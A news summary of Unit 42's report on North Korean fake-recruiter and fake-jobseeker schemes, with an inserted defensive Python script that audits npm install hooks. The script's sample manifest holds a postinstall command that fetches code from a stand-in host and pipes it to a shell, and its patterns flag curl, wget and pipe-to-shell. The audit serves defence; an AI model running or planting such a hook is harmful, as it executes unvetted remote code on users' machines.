November 22, 2023 at 08:37PM
Palo Alto Networks’ Unit 42 has identified two hacking schemes linked to state-sponsored actors in North Korea. The first scheme, called Contagious Interview, involves threat actors posing as job recruiters on job boards and tricking software engineers into downloading malware. The second scheme, Wagemole, sees threat actors pretending to be jobseekers for financial gain and espionage purposes. Unit 42 believes these schemes are run by North Korean state-sponsored actors. The researchers also discovered previously unknown malware families used in these schemes. The motive for Wagemole is not specified, but it is noted that North Korean tech workers send their wages home to fund weapons programs.
According to meeting notes from Palo Alto Networks’ Unit 42, there are two hacking schemes linked to state-sponsored actors in North Korea. The first scheme is called Contagious Interview, where threat actors pose as potential employers and trick software engineers into downloading malware-laden Node Package Manager (npm) packages from GitHub. The second scheme, called Wagemole, involves threat actors pretending to be jobseekers for financial gain and espionage.
Unit 42 has “moderate confidence” that Contagious Interview is run by a North Korean state-sponsored actor and “high confidence” that Wagemole is one of North Korea’s campaigns. The infrastructure for Contagious Interview started appearing in December 2022, and the threat actors pose as recruiters for real and imaginary companies, advertising on job boards for various fields.
The scammers invite targets for online interviews, during which they ask the applicants to download a GitHub package. This allows the installation of info-stealers on software engineers’ systems, potentially granting access to their work or personal information.
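One defender-side check for the delivery mechanism described above, added here as an example and not code from Unit 42’s report: it parses a package.json and flags npm lifecycle hooks, which run automatically on `npm install` before a candidate reads any source. The sample manifest and the indicator patterns are constructed for illustration.

```python
import json
import re

# npm runs these hooks automatically during `npm install`, so a package handed
# over as a "take-home test" can execute code before anyone reviews it.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Constructed patterns that suggest a hook fetches or runs something rather
# than building the project. Tune these to your own environment.
SUSPICIOUS_PATTERNS = {
    "inline_eval": re.compile(r"\bnode\s+-e\b"),
    "remote_fetch": re.compile(r"\b(curl|wget|Invoke-WebRequest)\b"),
    "pipe_to_shell": re.compile(r"\|\s*(sh|bash)\b"),
    "obfuscated_encoding": re.compile(r"base64|fromCharCode", re.IGNORECASE),
}


def audit_package_json(text):
    """Return [(hook, reasons)] for every install-time script that needs a manual look."""
    manifest = json.loads(text)
    findings = []
    for hook, command in manifest.get("scripts", {}).items():
        if hook not in LIFECYCLE_HOOKS:
            continue  # e.g. "test" or "build" only run when invoked explicitly
        reasons = [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(command)]
        # Any install-time hook deserves review, even without a pattern hit.
        findings.append((hook, reasons or ["runs automatically at install"]))
    return findings


# Constructed sample manifest (not taken from the report) resembling a "coding task" repo.
SAMPLE_MANIFEST = """{
  "name": "interview-task",
  "version": "1.0.0",
  "scripts": {
    "test": "jest",
    "postinstall": "node -e \\"require('child_process').exec('curl -s http://example.invalid/x | sh')\\""
  }
}"""

if __name__ == "__main__":
    for hook, reasons in audit_package_json(SAMPLE_MANIFEST):
        print(f"{hook}: {', '.join(reasons)}")
```

Running `npm install --ignore-scripts` (or setting `ignore-scripts=true` in `.npmrc`) keeps these hooks from executing while the package is inspected.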
Unit 42 discovered two previously unknown malware families used by the Contagious Interview group. One is a JavaScript-based info-stealer and loader named BeaverTail, while the other is a Python-based backdoor called InvisibleFerret. BeaverTail targets basic information and credit card details, while InvisibleFerret can keylog credentials, exfiltrate data, facilitate remote access, and download AnyDesk RMM.
While investigating Contagious Interview, Unit 42 also found documents related to the counterpart social engineering scheme, Wagemole. These documents included fraudulent CVs, stolen US permanent resident cards, fake identities from various nations, interview tips and scripts, and job postings from US companies. The motive or objective of Wagemole was not specified, but it is noted that North Korean tech workers send their wages home to fund weapons programs.
It is important to be vigilant and aware of these schemes, as the threat actors are using sophisticated methods to deceive their targets.